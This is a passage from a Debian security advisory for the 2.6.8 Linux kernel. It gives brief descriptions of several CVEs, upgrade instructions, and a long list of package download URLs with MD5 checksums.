in the random number\n    generator which may permit local users to cause a denial of service or\n    gain additional privileges. This issue is not believed to effect default\n    Debian installations where only root has sufficient privileges to exploit\n    it. \n\nCVE-2007-3740\n\n    Steve French reported that CIFS filesystems with CAP_UNIX enabled \n    were not honoring a process\u0027 umask which may lead to unintentinally\n    relaxed permissions. \n    \nCVE-2007-3848\n\n    Wojciech Purczynski discovered that pdeath_signal was not being reset\n    properly under certain conditions which may allow local users to gain\n    privileges by sending arbitrary signals to suid binaries. \n\nCVE-2007-4133\n\n    Hugh Dickins discovered a potential local DoS (panic) in hugetlbfs. \n    A misconversion of hugetlb_vmtruncate_list to prio_tree may allow\n    local users to trigger a BUG_ON() call in exit_mmap. \n\nCVE-2007-4308\n\n    Alan Cox reported an issue in the aacraid driver that allows unprivileged\n    local users to make ioctl calls which should be restricted to admin\n    privileges. \n\nCVE-2007-4573\n\n    Wojciech Purczynski discovered a vulnerability that can be exploited\n    by a local user to obtain superuser privileges on x86_64 systems. \n    This resulted from improper clearing of the high bits of registers\n    during ia32 system call emulation. This vulnerability is relevant\n    to the Debian amd64 port as well as users of the i386 port who run\n    the amd64 linux-image flavour. \n\nCVE-2007-5093\n\n    Alex Smith discovered an issue with the pwc driver for certain webcam\n    devices. If the device is removed while a userspace application has it\n    open, the driver will wait for userspace to close the device, resulting\n    in a blocked USB subsystem. This issue is of low security impact as\n    it requires the attacker to either have physical access to the system\n    or to convince a user with local access to remove the device on their\n    behalf. \n    \nCVE-2007-6063\n\n    Venustech AD-LAB discovered a a buffer overflow in the isdn ioctl\n    handling, exploitable by a local user. \n\nCVE-2007-6151\n\n    ADLAB discovered a possible memory overrun in the ISDN subsystem that\n    may permit a local user to overwrite kernel memory leading by issuing\n    ioctls with unterminated data. \n\nCVE-2007-6206\n\n    Blake Frantz discovered that when a core file owned by a non-root user\n    exists, and a root-owned process dumps core over it, the core file\n    retains its original ownership. This could be used by a local user to\n    gain access to sensitive information. \n\nCVE-2007-6694\n\n    Cyrill Gorcunov reported a NULL pointer dereference in code specific\n    to the CHRP PowerPC platforms. \n\nCVE-2008-0007\n\n    Nick Piggin of SuSE discovered a number of issues in subsystems which\n    register a fault handler for memory mapped areas. \n\nThe following matrix lists additional packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\n                                 Debian 3.1 (sarge)\n     kernel-image-2.6.8-alpha    2.6.8-17sarge1\n     kernel-image-2.6.8-amd64    2.6.8-17sarge1\n     kernel-image-2.6.8-hppa     2.6.8-7sarge1\n     kernel-image-2.6.8-i386     2.6.8-17sarge1\n     kernel-image-2.6.8-ia64     2.6.8-15sarge1\n     kernel-image-2.6.8-m68k     2.6.8-5sarge1\n     kernel-image-2.6.8-s390     2.6.8-6sarge1\n     kernel-image-2.6.8-sparc    2.6.8-16sarge1\n     kernel-patch-powerpc-2.6.8  2.6.8-13sarge1\n     fai-kernels                 1.9.1sarge8\n\nWe recommend that you upgrade your kernel package immediately and reboot\nthe machine. If you have built a custom kernel from the kernel source\npackage, you will need to rebuild to take advantage of these fixes. \n\nUpgrade Instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nDebian 3.1 (oldstable)\n- ----------------------\n\nOldstable updates are available for alpha, amd64, hppa, i386, ia64, m68k, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-6sarge1.dsc\n    Size/MD5 checksum:      846 4503eeaf9e1a21a9f220e2d9c31e0123\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-15sarge1.dsc\n    Size/MD5 checksum:     1191 bfba4b91bbd166d14d0bace5ac137715\n  http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-17sarge1.diff.gz\n    Size/MD5 checksum:  1124155 d0e37e157fd2c4a9889222377ae6a956\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-6sarge1.tar.gz\n    Size/MD5 checksum:    18572 fffdd006af1f26150eb6131f10c14c8f\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-hppa_2.6.8-7sarge1.tar.gz\n    Size/MD5 checksum:    73206 97e4fadb9612c1a9ce969a0cbdc663f4\n  http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge8.dsc\n    Size/MD5 checksum:      621 fd5cf0a4b08aadf72cedb8029390fdeb\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-17sarge1.dsc\n    Size/MD5 checksum:     1103 27f8b65b1acae74eac82f6484edbc5e5\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-17sarge1.tar.gz\n    Size/MD5 checksum:    44625 4e68e046835cd0dce3ba2dc096f21924\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-13sarge1.tar.gz\n    Size/MD5 checksum:    32565 406db278e655291be89254da5a4e15f8\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-hppa_2.6.8-7sarge1.dsc\n    Size/MD5 checksum:     1013 defcdc70dd9d969ddfaed2819b341758\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-15sarge1.tar.gz\n    Size/MD5 checksum:    69734 a5e62e3da21f1e89e1c7f76508de9673\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-17sarge1.tar.gz\n    Size/MD5 checksum:    82008 c90b3a12c9bf77807d0d5c3ab6cf1567\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-m68k_2.6.8-5sarge1.tar.gz\n    Size/MD5 checksum:    22997 75027ce480514543ad6d565d43890a3e\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-16sarge1.tar.gz\n    Size/MD5 checksum:    32414 676fdb7a2c0cb66cd6c13a75b836f755\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-16sarge1.dsc\n    Size/MD5 checksum:     1036 088234b948dd74a6c869f743a5346a54\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-17sarge1.dsc\n    Size/MD5 checksum:      812 e12f4f68ee249f53bab5b4752d6b2795\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-17sarge1.tar.gz\n    Size/MD5 checksum:    96384 bd4d726f97468d6cca1139cf80b1342a\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-17sarge1.dsc\n    Size/MD5 checksum:     1047 80bb021a47b74d6b1e486c2bba6c55b8\n  http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-17sarge1.dsc\n    Size/MD5 checksum:     1002 0a956bc9d48251885d52d4b4d4b07310\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-13sarge1.dsc\n    Size/MD5 checksum:     1071 39e866b6617c57f4acf7e06d3b7ae82e\n  http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge8.tar.gz\n    Size/MD5 checksum:    32434 ee1ef40c64f09bcdc25d9c9b7ea325e0\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-m68k_2.6.8-5sarge1.dsc\n    Size/MD5 checksum:      874 9db0c07fe9a8cc114a82f3d4f8a209a9\n  http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8.orig.tar.gz\n    Size/MD5 checksum: 43929719 0393c05ffa4770c3c5178b74dc7a4282\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-17sarge1_all.deb\n    Size/MD5 checksum: 34955480 ece884d31c0a9bd290d467f00973252e\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-patch-2.6.8-s390_2.6.8-6sarge1_all.deb\n    Size/MD5 checksum:    16650 2304fae6c3d145826acea1403133ef98\n  http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-tree-2.6.8_2.6.8-17sarge1_all.deb\n    Size/MD5 checksum:    39758 12ee237ef5816a9c1f87697a0397802a\n  http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-doc-2.6.8_2.6.8-17sarge1_all.deb\n    Size/MD5 checksum:  6190062 e7e672dd30a416f98fb8dd3ead7e938b\n  http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-patch-debian-2.6.8_2.6.8-17sarge1_all.deb\n    Size/MD5 checksum:  1194926 dfc3e12e6e7739c91c17e150a7242fa2\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-4-generic_2.6.8-17sarge1_alpha.deb\n    Size/MD5 checksum:   238146 8dd62b8c39cceeedd5efaa4b2eee4582\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-4-smp_2.6.8-17sarge1_alpha.deb\n    Size/MD5 checksum:   232626 0f789080227336bd274f4ddacc4a749b\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-4_2.6.8-17sarge1_alpha.deb\n    Size/MD5 checksum:  2765374 6f857f2bc6f2f0d5a94a98ae814c4e87\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-4-smp_2.6.8-17sarge1_alpha.deb\n    Size/MD5 checksum: 20094120 e0a3941fdaa513458f54b78e5b3ebd41\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-4-generic_2.6.8-17sarge1_alpha.deb\n    Size/MD5 checksum: 20242970 0944d9b857e2383f2748fab122de3a5d\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_amd64.deb\n    Size/MD5 checksum:   225228 fc7e590bc877da3505ee3442409bf8ee\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4_2.6.8-17sarge1_amd64.deb\n    Size/MD5 checksum:   228186 4663c6daf166b5559e408795f44d84f5\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-generic_2.6.8-17sarge1_amd64.deb\n    Size/MD5 checksum: 12579110 41c47936fe7cd1bb8e28177cf282e957\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-generic_2.6.8-17sarge1_amd64.deb\n    Size/MD5 checksum:   231428 dfdf341727fcca4af9ff41f7f0046e1b\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_amd64.deb\n    Size/MD5 checksum: 13238846 51bca8a45157f119dc001e786e325cca\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_amd64.deb\n    Size/MD5 checksum: 13063162 14486d83aee59b7616ff63de003340ac\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8_2.6.8-17sarge1_amd64.deb\n    Size/MD5 checksum: 13275762 767dcb70ca259ff0dc07f6cb8351a83d\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13_2.6.8-17sarge1_amd64.deb\n    Size/MD5 checksum:  2728264 db7534ded22b911afffa5413d540dbbd\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_amd64.deb\n    Size/MD5 checksum:   226722 33c904e9fd0a2f754f0d5aed640a3bd3\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8_2.6.8-17sarge1_amd64.deb\n    Size/MD5 checksum:   230322 917d95bec917d2a7588867f81d88a2e9\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4_2.6.8-17sarge1_amd64.deb\n    Size/MD5 checksum: 13082028 78be67d79a13baba4a6c798624f7f818\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4_2.6.8-7sarge1_hppa.deb\n    Size/MD5 checksum:  2820206 0a14c1185bcde28d0a97eaeef9e11e3f\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-64_2.6.8-7sarge1_hppa.deb\n    Size/MD5 checksum: 17550802 fabf823c16fcb3e0bbf69d0081faafd8\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-64-smp_2.6.8-7sarge1_hppa.deb\n    Size/MD5 checksum:   219244 ff1d717d7b3d1db40c96d15b96b8a447\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-64-smp_2.6.8-7sarge1_hppa.deb\n    Size/MD5 checksum: 18374164 e088d77a7e64efa4d825416f94fd5db6\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-32-smp_2.6.8-7sarge1_hppa.deb\n    Size/MD5 checksum:   220054 5e8db88176af86cf5d5968dac2816ac6\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-32-smp_2.6.8-7sarge1_hppa.deb\n    Size/MD5 checksum: 17020158 1e3f2fc9f9764e1823054df8abde860c\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-32_2.6.8-7sarge1_hppa.deb\n    Size/MD5 checksum:   220598 e3419d467dc69e90e2db720c519268d3\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-32_2.6.8-7sarge1_hppa.deb\n    Size/MD5 checksum: 16110870 cb91278b4861aa27da3555e3ae05a842\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-64_2.6.8-7sarge1_hppa.deb\n    Size/MD5 checksum:   219758 ff98c244a5777bf1cb9d3aa42e92035b\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-k7-smp_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:   258700 b406cff5cdfce0b1ebb0999b940bcf77\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-386_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum: 14079400 b3034d3d756026061d6d1ae64f7670ac\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:   226622 89ab2fe13383be55139f779983e76f56\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:   228124 0232808c2f4af4679ff387fd5aef30c2\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum: 13238830 83c9fa536a5039d9b7faaedd55c0d2df\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum: 13208166 7d76aba45eeea785e68e144c93f8fa55\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-generic_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:   231474 a9af96e38de18058a0bbb855ed0193f3\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-686_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum: 15558172 1ef83fe26c46d25f209cb0a76140c0e3\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum: 13236626 fad30247937094d606a01d53a2eff086\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:  2728376 e2538d185c863ac7adf9dd41ac73f83d\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-686-smp_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum: 15397692 580feea340f69d04fafcd052268bb314\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-k7-smp_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum: 15173410 f477356acda36ec633c3bee285794377\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:  2784978 76f4162d37d785b5e0648435936774f6\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-386_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:   263456 3ddcc23d88f64f8a185c3a3dc4ae3402\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:   225052 c266db2ed1f497b91c8202c2e9511bd3\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-k7_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum: 15282426 bce3bfbc0e6aede5dc503b37935b050a\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:   230266 2172a8e3ff5107cb582b5a31111b904b\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-686-smp_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:   258222 e02e548b571117fa3a0b68add40c3893\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-686_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:   260930 a4765a3da36be625c104281daecc29d2\n  http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge8_i386.deb\n    Size/MD5 checksum: 12010766 5c06b0a78b203b2032aa327839fa9795\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-k7_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum:   260956 5bf06a1619132b0624299735caf26879\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-generic_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum: 12579278 f6c685f628478fcc8f37257a6e71aedd\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8_2.6.8-17sarge1_i386.deb\n    Size/MD5 checksum: 13276128 541fc888c5aa5dee5e186185d1f2256f\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-itanium_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum: 21496770 8336b695564c2eb6d8dc98a13c3b4e1a\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-itanium-smp_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:   205878 2f8285b89e03dee6c71f9d8079d13499\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley-smp_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:    12228 b69b46b5a764b898baaf3ba3ad056d5f\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:    12162 3d5dfd32448f8cb967dd1ce9549789af\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:  3104422 af94110dd2e8401a975315dd93aaa28b\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:    12172 618961c987120133ee1c999e4cf5f62f\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley-smp_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:    12236 7ca412f9885d85f92340423de43e284f\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:    12140 031a5db578a7291bf25c13b7be4b4ec6\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-itanium_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:   206340 85610c56d71469abb003503c9395f639\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-mckinley_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:   206076 62768e32c962c2f1f2f19c0062800557\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium-smp_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:    12202 a4a24b0e48c4f6c2c3d8ab17fc6fe4ae\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-mckinley_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum: 21417820 daa90c69a36eb5baf3231fed495766e1\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-mckinley-smp_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:   205672 e5befe9b90d7f8d43ed7e1dfff89851c\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-itanium-smp_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum: 22158208 8a186facbb3023845284531d27c01486\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:    12136 fe3ae95000fba99026557e9f3110eef9\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-mckinley-smp_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum: 22174026 de343e5cddd6936ec435cdc87d5ab689\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium-smp_2.6.8-15sarge1_ia64.deb\n    Size/MD5 checksum:    12200 75abbf3dc640b0765b0f510c0c783ecb\n\nm68k architecture (Motorola Mc680x0)\n\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-sun3_2.6.8-5sarge1_m68k.deb\n    Size/MD5 checksum:  2997446 90b62190daab090dd211b2e2fa76e634\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mvme16x_2.6.8-5sarge1_m68k.deb\n    Size/MD5 checksum:  3053150 9876f36e6cbad66ac690362955b3ee6c\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-q40_2.6.8-5sarge1_m68k.deb\n    Size/MD5 checksum:  3111618 38fdf55f9f32aa26df0b3001fd6b77a2\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-amiga_2.6.8-5sarge1_m68k.deb\n    Size/MD5 checksum:  3311580 052d54a9c2e6eab73cf870634aaf78e3\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-hp_2.6.8-5sarge1_m68k.deb\n    Size/MD5 checksum:  2992404 cd498a3a110af341e7052fb06ec8b0bc\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mac_2.6.8-5sarge1_m68k.deb\n    Size/MD5 checksum:  3178962 1160ae756c286e7e2845cbeb1326c3bb\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mvme147_2.6.8-5sarge1_m68k.deb\n    Size/MD5 checksum:  2982482 677c66d0af2580084d6d061bfd63ffd4\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-bvme6000_2.6.8-5sarge1_m68k.deb\n    Size/MD5 checksum:  3018000 89321aa5c34c8c9c95a61a86d0337699\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-atari_2.6.8-5sarge1_m68k.deb\n    Size/MD5 checksum:  3105192 0a020af9116bd8ac96d2c3eb054b6840\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-headers-2.6.8-4_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum:  5153168 2f57ad5241d60f31e262541b1b9bf08a\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power3-smp_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum: 13953866 46a1861b3cd33737bdd60a0f72f397c4\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power3_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum: 13599558 0ddb46fa72e94a9018eccfd3d2f0b40c\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-powerpc-smp_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum: 13873214 f012b664fbc58bfcdfbba594d38bc855\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power4-smp_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum: 13943782 153a4ba86086ae315977b069a3c8fa3c\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power3_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum:   412788 719ae014adea5b6a7c3c36b2b0e268ed\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-powerpc_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum:   412382 228e63e6d49179b0dc802b903b1b52e4\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power4-smp_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum:   411974 bcf255c3858b2d9a01bbbb2b7c25aff2\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-powerpc_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum: 13616728 e6762f501e5422e23f023b79037a8ca5\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power4_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum:   412034 0334c1128e3e843ebc68963633480ba4\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-powerpc-smp_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum:   412136 a761c81f7e2c38637fecefeb197f8a5b\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power3-smp_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum:   412708 584de35626e4445772f28341560aae76\n  http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power4_2.6.8-13sarge1_powerpc.deb\n    Size/MD5 checksum: 13583634 0f334a6487d58f02b75f9102641d4541\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-4-s390x_2.6.8-6sarge1_s390.deb\n    Size/MD5 checksum:  3199350 2dec14becfc609e1414a00a726a78153\n  